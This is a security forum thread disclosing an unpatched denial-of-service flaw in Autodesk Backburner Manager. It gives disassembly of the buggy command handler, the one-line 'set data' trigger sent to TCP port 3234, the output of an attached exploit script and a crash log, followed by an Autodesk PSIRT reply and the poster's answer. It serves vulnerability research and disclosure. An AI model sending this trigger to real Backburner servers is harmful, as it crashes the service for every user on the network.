Results 1 to 3 of 3

Thread: Autodesk BackBurner Null Dereference - Denial of Service Share/Save - My123World.Com!

  1. #1
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    734

    Autodesk BackBurner Null Dereference - Denial of Service

    Autodesk BackBurner listens on TCP port 3234 and accepts a set of telnet commands from remote machines. For a particular command it fails to handle the request when insufficient number of arguments are passed and results into Null Dereference crash leading to Denial of Service.

    Autodesk BackBurner Denial of Service (Null Dereference)


    AFFECTED SOFTWARE
    - Autodesk Backburner Manager 3
    - Version 2016.0.0.2150 and prior


    Download Link
    - https://knowledge.autodesk.com/suppo...-max-2016.html




    VULNERABILITY
    - The vulnerability exists in libDLnrapi30.dll which is a Dynamic Link Library loaded by Backburner Manager process manager.exe
    listening on TCP port 3234. The application does not take care of number of arguments passed to a specific remote command and
    results into Null Dereferece leading to Denial of Service.




    Available Remote Commands:


    kali@kali:~/Desktop$ telnet 172.16.36.133 3234
    Trying 172.16.36.133...
    Connected to 172.16.36.133.
    Escape character is '^]'.
    250 backburner 1.0 Ready.
    backburner>help
    200 Help
    Available Commands: Arguments:
    get {argument} compress {on|off}
    set {argument} data {xml|list}
    new {argument} status
    del {argument} prompt {on|off}
    kill updates {on|off}
    help mgrinfo
    exit cliinfo
    controller
    job
    joblog
    jobcount
    jobstate
    jobpriority
    joblist
    jobhlist
    server
    srvschedule
    srvcount
    srvstate
    srvlist
    backburner>






    Vulnerable Code:


    With image base 0x10000000


    Following is switch-case portion when program determines which command is executed:
    .text:1005213D movzx ecx, ds:byte_100546B0[eax]
    .text:10052144 jmp dsff_10054648[ecx*4] ; switch jump




    Following command, without any argument leads to crash


    backburner>set data


    .text:1005221D
    .text:1005221D loc_1005221D: ; jumptable 10052144 case 2
    .text:1005221D mov eax, [ebx+74Ch]
    .text:10052223 mov ecx, [eax]
    .text:10052225 lea edx, [ebx+2FCh]
    .text:1005222B push edx
    .text:1005222C push 528h
    .text:10052231 push 10h
    .text:10052233 push eax
    .text:10052234 mov eax, [ecx+14h]
    .text:10052237 call eax
    .text:10052239 add esp, 10h
    .text:1005223C push esi
    .text:1005223D lea ecx, [ebx+768h]
    .text:10052243 call ??ACStr@BBString@@QAEAA_WH@Z ; This is the buggy function. It does nothing when no argument is passed with the command. Rest of the switches do take care of it.
    .text:10052248 xor ecx, ecx
    .text:1005224A cmp word ptr [eax], 78h ; Crash Point - null dereference
    .text:1005224E setnz cl
    .text:10052251 mov eax, ecx
    .text:10052253 mov [ebx+77Ch], eax
    .text:10052259 cmp eax, esi
    .text:1005225B jnz short loc_10052264




    Exploitation:




    kali@kali:~/Desktop$ python BackBurner-NullDereference.py --host 172.16.36.133
    remote_host: 172.16.36.133
    remote_port: 3234


    [+] Socket Created


    [+] Socket Connected to 172.16.36.133 on port 3234
    250 backburner 1.0 Ready.


    backburner>
    Set Data Command
    BackBurner Manager should have crashed




    (1500.1034): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00f51758 ecx=00000000 edx=00000000 esi=00000000 edi=6e1cfe10
    eip=6dcb224a esp=0470cd0c ebp=0470cd60 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Autodesk\Backburner\libDLnrapi30.dll -
    libDLnrapi30!nrCreateNetworkManager+0x1207a:
    6dcb224a 66833878 cmp word ptr [eax],78h ds:002b:00000000=????


    0:015> kb
    ChildEBP RetAddr Args to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0470cd60 00000000 00000000 00000000 00000000 libDLnrapi30!nrCreateNetworkManager+0x1207a




    Impact:
    - Denial of Service to all users




    Vendor Patch:
    - No patch is available

    Rename exploit module from .txt to .py

    Cheers!
    Attached Files Attached Files
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  2. #2

    Follow Up

    Thank you for the detailed report of your findings. While we investigate and work on any remediation, we would also like to understand if you had any experience notifying or attempting to contact Autodesk prior to posting the information here. If you are open to discussing privately, you may contact us directly at PSIRT@autodesk.com

    Regards,
    Product Security Incident Response Team (PSIRT)
    Autodesk, Inc.

  3. #3
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    734
    Quote Originally Posted by adsk_responder View Post
    Thank you for the detailed report of your findings. While we investigate and work on any remediation, we would also like to understand if you had any experience notifying or attempting to contact Autodesk prior to posting the information here. If you are open to discussing privately, you may contact us directly at PSIRT@autodesk.com

    Regards,
    Product Security Incident Response Team (PSIRT)
    Autodesk, Inc.
    Hi,

    Based on the information available for CVE-2007-4749 http://cve.mitre.org/cgi-bin/cvename...=CVE-2007-4749 and CVE-2016-2344 https://www.kb.cert.org/vuls/id/732760 where patches were not released for software and users were advised to follow documentation that outlines the security risks of operating Backburner on untrusted networks, no attempt was made to contact Autodesk prior to posting the information here.

    Please feel free if you like to discuss anything related to it.

    Cheers!
    b0nd
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •